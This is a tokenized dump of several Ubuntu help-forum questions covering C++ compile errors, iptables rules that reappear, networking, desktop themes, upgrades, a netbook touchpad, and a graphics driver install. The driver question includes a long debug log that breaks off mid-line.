300195	why am i getting compile time errors in this c++ program ?	i am new to ubuntu and its terminal . i am trying to code c++ using nano something.cpp a general `` hello world '' program at first . first i got some error about iostream.h and cout not recognised . i searched the web and found that it was a newer c++ and we had to use iostream instead of iostream.h and std : :cout instead of cout . it worked well after making those changes ( compiled using gcc ) . now i tried creating the second program . here i had to input my name and it would show `` hello myname '' . the code was : # include < string > # include < iostream > int main ( ) { string g ; std : :cout < < `` what is your name ? \n '' ; std : :cin > > g ; std : :cout < < `` hello\n '' < < g < < std : :endl ; return 0 ; } when i tried to compile ( using gcc myprog.cpp -o hello ) ; i got the following errors : prog.cpp : in function ‘int main ( ) ’ : prog.cpp:5:1 : error : ‘string’ was not declared in this scope prog.cpp:5:1 : note : suggested alternative : /usr/include/c++/4.6/bits/stringfwd.h:65:33 : note : ‘std : :string’ prog.cpp:5:8 : error : expected ‘ ; ’ before ‘g’ prog.cpp:7:13 : error : ‘g’ was not declared in this scope i searched the web but did not find any help . how do i get rid of these errors ? i would also be happy if somebody would suggest me a book on this `` newer '' c++ .
300197	can not permanently clear iptable rules	i use the following commands to flush all iptable rules : sudo iptables -f sudo iptables -x sudo iptables -t nat -f sudo iptables -t nat -x sudo iptables -t mangle -f sudo iptables -t mangle -x sudo iptables -p input accept sudo iptables -p forward accept sudo iptables -p output accept but after a few minutes , the iptables rules come back to the previous state before i cleared the rules . this is very weird . can anyone help me figure out why it is happening ?
300200	networking commands does n't work ; what should i do ?	commands i tried on ubuntu server 12.04 : # sudo /etc/init.d/networking start rather than invoking init scripts through `/etc/init.d` , use the service ( 8 ) utility , e.g . service networking start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start networking networking stop/waiting # service networking status networking stop/waiting # service networking start networking stop/waiting
300204	how to get 12.04 native theme after upgrade from 10.04 with /home unformated	i had 10.04 with /home on its own partition . i then freshly installed 12.04 while retaining /home . the whole process went perfectly well . but my desktop still retains a gnome-like look . i know it has something to do with a .gnome* folder with gnome settings . can anyone help me fix this to have the 12.04 native look ?
300205	can not upgrade my version of ubuntu 12.10 to 13.04	please help.. i open the software updater but after checking for updates , the machine told me that '' the software on this computer is up to date '' i try to check my version of ubuntu and it 's still 12.10.. how can i resolve this problem ? ?
300207	keyboard and touchpad quit working	i have a serious problem with my asus 1005px , running ubuntu 13.04 . the keyboard is very slow and working unreliable ( e.g . input is 'jjjjj ' if 'j ' is input ) and the touch-pad is dead . in the beginning it worked properly with full touch-pad functionality , but after some time the problems started and now i only can use it with a usb keyboard and usb mouse . this is what i tried : update bios update kernel to 3.9.3 instal gpointing-device-settings edit /etc/modprobe.d/option.conf with options psmouse proto=imps and afterwards run sudo modprobe -r psmouse & & sudo modprobe psmouse edit /etc/x11/gksu gedit xorg.conf and added the text : section `` inputclass '' identifier `` etps/2 elantech touchpad '' matchproduct `` etps/2 elantech touchpad '' matchdevicepath `` /dev/input/event* '' driver `` synaptics '' option `` areatopedge '' `` 50 '' endsection then i edited grub by sudo gedit /etc/default/grub and added : grub_cmdline_linux_default= '' quietly splash acpi_iso=linux acpi=off `` grub_cmdline_linux= '' i8042.nomux=1 locale=fr_fr i8042.reset '' i also installed other distro 's like ubuntu 12.10 ; mintkde 14 ; dsl ; puppylinux ; fuduntu ; fedora , lubuntu 12.10 etc at this stage , none of the above options solves the problem . sometimes when a new distro is installed , the touch-pad reacted for short moment . so it is not a hardware problem . does anyone see a solution ?
300208	can not install cedar tail drm in dkms format on ubuntu running on a netbook	i have a netbook ( asus eeepc 1015cx ) and recently i have installed ubuntu 12.04lts . all seems to run fine , however i have a problem with the graphics card . when i turn on the computer the brightness is set to the lowest possible setting automatically , the buttons do n't work ( neither the option in the settings ) . the brightness is restored when i log off and back on . cedar tail drm driver which is shown in the additional drivers can not be installed as it gives me an error . here is the shortened output from the file log from the error : 2013-05-26 09:57:30,350 warning : modinfo for module cedarview_gfx failed : error : modinfo : could not find module cedarview_gfx 2013-05-26 09:57:30,352 debug : got handler kmod : cedarview_gfx ( [ kernelmodulehandler , nonfree , disabled ] cedar trail drm driver in dkms format . ) 2013-05-26 09:57:30,352 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027d8sv00001043sd00008437bc04sc03i00 ' ) 2013-05-26 09:57:30,380 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' } 2013-05-26 09:57:30,381 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,381 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' } 2013-05-26 09:57:30,382 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,383 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'acpi : pnp0c01 : ' ) 2013-05-26 09:57:30,383 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027c1sv00001043sd000083adbc01sc06i01 ' ) 2013-05-26 09:57:30,409 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'ahci ' } 2013-05-26 09:57:30,410 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'ahci ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,411 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'ahci ' } 2013-05-26 09:57:30,411 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'ahci ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,412 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'acpi : int0800 : ' ) 2013-05-26 09:57:30,412 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027ccsv00001043sd000083adbc0csc03i20 ' ) 2013-05-26 09:57:30,439 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'acpi : pnp0303 : pnp030b : ' ) 2013-05-26 09:57:30,439 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'input : b0011v0001p0001eab41-e0,1,4,11,14 , k71,72,73,74,75,76,77,79,7a,7b,7c,7d,7e,7f,80,8c,8e,8f,9b,9c,9d,9e,9f , a3 , a4 , a5 , a6 , ac , ad , b7 , b8 , b9 , d9 , e2 , ram4 , l0,1,2 , sfw ' ) 2013-05-26 09:57:30,441 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2013-05-26 09:57:30,441 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,442 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' } 2013-05-26 09:57:30,443 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,443 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'input : b0019v0000p0001e0000-e0,1 , k74 , ramlsfw ' ) 2013-05-26 09:57:30,444 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2013-05-26 09:57:30,445 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,445 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' } 2013-05-26 09:57:30,446 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,446 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'input : b0003v13d3p5711e1204-e0,1 , kd4 , ramlsfw ' ) 2013-05-26 09:57:30,447 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2013-05-26 09:57:30,448 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,448 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' } 2013-05-26 09:57:30,449 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,450 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'acpi : lnxsybus : ' ) 2013-05-26 09:57:30,450 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'dmi : bvnamericanmegatrendsinc. : bvr1015cx.0501 : bd02/07/2012 : svnasustekcomputerinc. : pn1015cx : pvrx.x : rvnasustekcomputerinc. : rn1015cx : rvrx.xx : cvnasustekcomputerinc . : ct10 : cvrx.x : ' ) 2013-05-26 09:57:30,528 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v00001969d00002062sv00001043sd00008468bc02sc00i00 ' ) 2013-05-26 09:57:30,559 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'atl1c ' } 2013-05-26 09:57:30,559 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'atl1c ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,560 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'input : b0011v0002p0007e01b1-e0,1,3 , k110,111,145,14a,14d,14e , ra0,1,18,1c,2f,35,36,39 , mlsfw ' ) 2013-05-26 09:57:30,561 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2013-05-26 09:57:30,562 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,562 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'joydev ' } 2013-05-26 09:57:30,563 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'joydev ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,563 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'joydev ' } 2013-05-26 09:57:30,564 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'joydev ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,565 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'joydev ' } 2013-05-26 09:57:30,566 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'joydev ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,566 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' } 2013-05-26 09:57:30,567 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,567 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'usb : v13d3p5711d1204dcefdsc02dp01ic0eisc02ip00 ' ) 2013-05-26 09:57:30,697 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'usb : v13d3p5711d1204dcefdsc02dp01ic0eisc01ip00 ' ) 2013-05-26 09:57:30,700 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'uvcvideo ' } 2013-05-26 09:57:30,701 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'uvcvideo ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,702 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027casv00001043sd000083adbc0csc03i00 ' ) 2013-05-26 09:57:30,726 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027cbsv00001043sd000083adbc0csc03i00 ' ) 2013-05-26 09:57:30,753 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v00008086d00000bf1sv00001043sd000084a9bc06sc00i00 ' ) 2013-05-26 09:57:30,779 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'acpi : etd0101 : pnp0f13 : ' ) 2013-05-26 09:57:30,779 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'platform : fixed mdio bus ' ) 2013-05-26 09:57:30,783 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'pci : v0000168cd0000002bsv00001a3bsd00001089bc02sc80i00 ' ) 2013-05-26 09:57:30,847 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'ath9k ' } 2013-05-26 09:57:30,847 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'ath9k ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,848 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'wmi:05901221-d566-11d1-b2f0-00a0c9062910 ' ) 2013-05-26 09:57:30,849 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'platform : pcspkr ' ) 2013-05-26 09:57:30,852 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'pcspkr ' } 2013-05-26 09:57:30,853 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'pcspkr ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,854 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_pcsp ' } 2013-05-26 09:57:30,854 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_pcsp ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,855 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'platform : coretemp ' ) 2013-05-26 09:57:30,858 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'x86cpu : vendor:0000 : family:0006 : model:0036 : feature : ,0000,0001,0002,0003,0004,0005,0006,0007,0008,0009,000b,000c,000d,000e,000f,0010,0011,0013,0015,0016,0017,0018,0019,001a,001b,001c,001d,001f,0034,0066,0068,006b,006c,006d,0072,0078,007c,0080,0082,0083,0084,0087,0088,0089,008e,008f,0096,00c0,00e1,00e7 ' ) 2013-05-26 09:57:30,893 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'microcode ' } 2013-05-26 09:57:30,893 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'microcode ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,894 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'coretemp ' } 2013-05-26 09:57:30,895 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'coretemp ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,895 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'serio : ty01pr00id00ex00 ' ) 2013-05-26 09:57:30,943 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'serio_raw ' } 2013-05-26 09:57:30,944 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'serio_raw ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,944 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'psmouse ' } 2013-05-26 09:57:30,945 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'psmouse ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,946 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'input : b0019v0000p0003e0000-e0,1 , k8e , ramlsfw ' ) 2013-05-26 09:57:30,947 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2013-05-26 09:57:30,948 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,948 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' } 2013-05-26 09:57:30,949 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,950 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'input : b0000v0000p0000e0000-e0,5 , kramlsfw6,8 , ' ) 2013-05-26 09:57:30,950 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2013-05-26 09:57:30,951 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,952 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'input : b0019v0000p0005e0000-e0,5 , kramlsfw0 , ' ) 2013-05-26 09:57:30,952 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2013-05-26 09:57:30,953 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2013-05-26 09:57:30,954 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0x904da0c > about hardwareid ( 'modalias ' , 'wmi:466747a0-70ec-11de-8a39-0800200c9a66 ' ) 2013-05-26 09:57:30,954 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027c9sv00001043sd000083adbc0csc03i00 ' ) 2013-05-26 09:57:30,955 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0019v0000p0000e0000-e0,1,4,14 , k71,72,73,8b,94,98 , ab , ac , b8 , b9 , bf , d4 , e3 , ee , f0 , f4,215,216,217,218,219,21a , ram4 , lsfw ' ) 2013-05-26 09:57:30,955 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'acpi : pnp0c02 : ' ) 2013-05-26 09:57:30,956 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027dasv00001043sd000083adbc0csc05i00 ' ) 2013-05-26 09:57:30,956 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027bcsv00001043sd000083adbc06sc01i00 ' ) 2013-05-26 09:57:30,957 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'platform : regulatory ' ) 2013-05-26 09:57:30,957 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0019v0000p0006e0000-e0,1 , ke0 , e1 , e3 , f1 , f2 , f3 , f4 , f5 , ramlsfw ' ) 2013-05-26 09:57:30,958 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'usb : v1d6bp0001d0305dc09dsc00dp00ic09isc00ip00 ' ) 2013-05-26 09:57:30,958 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'usb : v1d6bp0002d0305dc09dsc00dp00ic09isc00ip00 ' ) 2013-05-26 09:57:30,959 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0000v0000p0000e0000-e0,5 , kramlsfw2 , ' ) 2013-05-26 09:57:30,959 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'platform : microcode ' ) 2013-05-26 09:57:30,959 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'acpi : lnxsystm : ' ) 2013-05-26 09:57:30,960 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'platform : eisa ' ) 2013-05-26 09:57:30,961 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'platform : eeepc-wmi ' ) 2013-05-26 09:57:30,961 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'wmi : abbc0f72-8ea1-11d1-00a0-c90629100000 ' ) 2013-05-26 09:57:30,962 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d00002448sv00001043sd000083adbc06sc04i01 ' ) 2013-05-26 09:57:30,962 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'wmi:97845ed0-4e6d-11de-8a39-0800200c9a66 ' ) 2013-05-26 09:57:30,963 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027c8sv00001043sd000083adbc0csc03i00 ' ) 2013-05-26 09:57:30,964 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d00000be1sv00001043sd000084a9bc03sc00i00 ' ) 2013-05-26 09:57:30,964 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027d8sv00001043sd00008437bc04sc03i00 ' ) 2013-05-26 09:57:30,965 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'acpi : pnp0c01 : ' ) 2013-05-26 09:57:30,965 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027c1sv00001043sd000083adbc01sc06i01 ' ) 2013-05-26 09:57:30,966 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'acpi : int0800 : ' ) 2013-05-26 09:57:30,966 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027ccsv00001043sd000083adbc0csc03i20 ' ) 2013-05-26 09:57:30,967 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'acpi : pnp0303 : pnp030b : ' ) 2013-05-26 09:57:30,967 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0011v0001p0001eab41-e0,1,4,11,14 , k71,72,73,74,75,76,77,79,7a,7b,7c,7d,7e,7f,80,8c,8e,8f,9b,9c,9d,9e,9f , a3 , a4 , a5 , a6 , ac , ad , b7 , b8 , b9 , d9 , e2 , ram4 , l0,1,2 , sfw ' ) 2013-05-26 09:57:30,968 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0019v0000p0001e0000-e0,1 , k74 , ramlsfw ' ) 2013-05-26 09:57:30,968 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0003v13d3p5711e1204-e0,1 , kd4 , ramlsfw ' ) 2013-05-26 09:57:30,969 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'acpi : lnxsybus : ' ) 2013-05-26 09:57:30,969 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'dmi : bvnamericanmegatrendsinc. : bvr1015cx.0501 : bd02/07/2012 : svnasustekcomputerinc. : pn1015cx : pvrx.x : rvnasustekcomputerinc. : rn1015cx : rvrx.xx : cvnasustekcomputerinc . : ct10 : cvrx.x : ' ) 2013-05-26 09:57:30,970 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00001969d00002062sv00001043sd00008468bc02sc00i00 ' ) 2013-05-26 09:57:30,970 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0011v0002p0007e01b1-e0,1,3 , k110,111,145,14a,14d,14e , ra0,1,18,1c,2f,35,36,39 , mlsfw ' ) 2013-05-26 09:57:30,971 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'usb : v13d3p5711d1204dcefdsc02dp01ic0eisc02ip00 ' ) 2013-05-26 09:57:30,971 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'usb : v13d3p5711d1204dcefdsc02dp01ic0eisc01ip00 ' ) 2013-05-26 09:57:30,972 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027casv00001043sd000083adbc0csc03i00 ' ) 2013-05-26 09:57:30,972 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d000027cbsv00001043sd000083adbc0csc03i00 ' ) 2013-05-26 09:57:30,973 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v00008086d00000bf1sv00001043sd000084a9bc06sc00i00 ' ) 2013-05-26 09:57:30,973 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'acpi : etd0101 : pnp0f13 : ' ) 2013-05-26 09:57:30,974 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'platform : fixed mdio bus ' ) 2013-05-26 09:57:30,974 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'pci : v0000168cd0000002bsv00001a3bsd00001089bc02sc80i00 ' ) 2013-05-26 09:57:30,974 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'wmi:05901221-d566-11d1-b2f0-00a0c9062910 ' ) 2013-05-26 09:57:30,975 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'platform : pcspkr ' ) 2013-05-26 09:57:30,975 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'platform : coretemp ' ) 2013-05-26 09:57:30,976 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'x86cpu : vendor:0000 : family:0006 : model:0036 : feature : ,0000,0001,0002,0003,0004,0005,0006,0007,0008,0009,000b,000c,000d,000e,000f,0010,0011,0013,0015,0016,0017,0018,0019,001a,001b,001c,001d,001f,0034,0066,0068,006b,006c,006d,0072,0078,007c,0080,0082,0083,0084,0087,0088,0089,008e,008f,0096,00c0,00e1,00e7 ' ) 2013-05-26 09:57:30,976 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'serio : ty01pr00id00ex00 ' ) 2013-05-26 09:57:30,977 debug : querying driver db < 